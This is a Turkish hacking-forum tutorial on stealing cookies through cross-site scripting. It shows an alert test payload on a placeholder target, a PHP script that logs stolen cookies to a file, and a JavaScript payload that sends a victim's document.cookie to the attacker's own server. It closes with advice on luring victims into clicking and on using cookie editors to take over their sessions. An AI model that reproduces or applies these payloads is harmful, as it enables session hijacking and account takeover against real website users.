Xss ve Cookie ilişkisi

[SeCReT]

Xss çalmak nedemekdir ?
ne yani bu simdi biz hirsizmiyiz biseyler çalalim mantigiyla yola çikmayin ve dinleyin biraz (:-)) Simdi xss çalmanin mantigi sudur siz bir web sitesine girdiginizde site kendi cookie yapisina bagli olarak sizin bilgisayariniza bir cookie atar ve derki bu kullanicinin cookiesi budur benzetme yapacak olursak Nasil hepimizin Tc. Kimlik numarasi var isde hepimizin bi kimligi var Bu ülke içerisinde bu sayede taniniyorsak da cookiede ayni mantikla sitelere bizi tanitir ama aradaki fark bizim Tc. Kimlik numaramiz degismemesine ragmen Cookielerimiz degisir. Neden degisir derseniz onuda su sekilde bir örnekle açiklayayim Siz baska bi ülkenin vatandasi oldugunuzda Size Tc. Kimlik numaranizdaki numarayla ayni numarayi verirlermi tabii ki hayir e cookie degismesiyle alakasi ne diye soracak olursaniz sizin ip adresiniz genelde baglanti koptugunda degisir (Dinamik ip Oldugundan dolayi) ve siz her baska ip ile siteye giris yaptiginizda dogal olarakda cookie sizi baska birisi kabul edip yeni bi kimlik numarasi yanii bizim internet degimimizle cookie veriyo. Eger ana konuya dönecek olursak yani xss çalma mantigina siz eger isde gerekli makyaji yapip gerekli kimligi aldiginizda istediginiz isimle istediginiz yere girebilirsiniz degilmi mesela ameliyat olup basbakana benzerseniz ve onun kimligini alirsaniz basbakanliga girebilirsiniz (tavsiye etmem () ) ayni mantigi bozmadan devam edersek demekki biz baskasinin cookiesini çalip Siteye kendimizi onun gibi gösterirsek sitede istedigimiz kisi olabiliriz degilmi. Tabii ki evet ama önemli soru baskasinin kimligini nasil bulucaz tabii ki buda çok basit Xss Dedigimiz olaylar sayesinde simdi Xss çalmanin nedenini ve mantigini kavradigimiza göre artik xss çalma olayina Daha dogrusu metinin basindan beri xss çalma diye yaziyorum ama dogrusu ve gerçek deyimi cookie çalma yada xss ile cookie çalma olabilir böyle basladik böyle devam edelim bozmadan

Xss ile Coookie Nasil Çalinir
Simdi Xss ile cookie nasil çalinir bunu yapabilmek için java scriptten az çok anlamamiz gerekli normalde ama gerek yok burada ben gerekli komut ve bilgileri vermeye çalisacagim simdi bi site düsünelim ve bu sitede bi linke tikladigimizda o sayfayi yazdiran kodlar içersin ve adreside suna benzer bi sey olsun
[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] Simdi Buradan ne anliyoruz id numarasi yada haber numarasi diyelim 12 olan yaziyi yazdir simdi onun üzerinde az oynarsak belki xss bulabiliriz ilk önce test için java scriptteki alert komutunu test edelim nasil yapicaz http://www.hedef.com/haber.php?yazdir=<script>alert("Xss");</script>
Burada eger xss yiyosa Ekranda Xss seklinde bi uyari görürüz bu nedemek olur tabiiki bu sitede java script çalistirabiliyoruz ozaman ne yapmamiz gerekli devaminda cookie çalmaya çalismaliyiz peki java scriptte cookie kodu ne
Kod:
<script>alert("document.cookie");</script>
bunu sitenin sonuna söyle yazdigimizda ne olucak dersiniz http://www.hedef.com/haber.php?yazdir=<script>alert(document.cookie);</script>
tabii ki deminki Xss diye uyari gördügümüz ekranda Kendi cookiemizi görücez peki baskasinin cookiesini almak için ne yapmali ilk önce bi sniffer hazirlanmali sniffer hazirlamakla ilgili döküman ileride ayrintili yazicam ama amacimiz su anda sadece isimizi su kodlar görüyoro

Kod:
<?php
$cookie = $_GET['cookie'];
$fp = fopen('log.php', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br>');
fclose($fp);
?>


bu kodu bi ftpye atip cal.php olarak kaydedicez Garanti olsun Chmod 777 de verelim hadi () ardindan ise java script yardimiyla diger kisilerin cookielerini çalmaya geldi onuda javadaki küçük bir oyunla halledicez
Kod:
<script>location.href='http://www.sitemiz.com/cal.php?cookie= '%2Bescape(document.cookie)</script>

bunu sitemizin = (Esittir)'inden sonra ekliyoruz ve cookiesini çalmak istedigimiz kisinin tiklamasini sagliyoruz burasi sizin yaraticiliginiza kalmis bunu nasil yaparsiniz siz düsünün bi iki mantik göstericek olursam mesela bir web sitesi hazirlayin we tiklatmali bi sekilde yapin yani nasil tarif edeyim biri siteye girdiginde sanki o linke tiklamis gibi olsun (en basit anlatimi) yanii cokiesi olussun e tiklatma adresinede bizim kendi cookie çalma kodumuzu yazarsak elbetteki cookiemiz kendi sitemizdeki cal.php de gözükecekdir.
Cookieyi Çaldik
ee Napicaz çaldik adamin kimligini ama kendimi gizleyip içeriye nasil giricem bilmiyorum basit cookie editör veya proxomitron gibi programlar yardimiyla kolayca girebilirsiniz
Dökümanin Asil Amaci Xss ve Cookie iliskisi oldugundan dolayi fazla Detaya girmedim dicekdim de yine bayagi sey anlattigimi düsünüyorum ama önemli olan benim anlatmam degil sizin anlamaniz anladiysaniz benim için sorun yok anlamadiginiz kismi bu baslik altindan sorabilirsiniz. Saygilarimla redLine

Gelenekdendir Buraya izinsiz Baska sitelerde yayinlamayiniz veya yayinlarsanizda TiTHacK // redLine'den Alintidir yazin dicem ama bu güne kadar yazdigim her dökümanin çalindigi gibi bunuda ayni sekilde çalip kendi yazmis gibi gösteren arkadaslar olacakdir neyse saglik olsun Kolay gelsin ()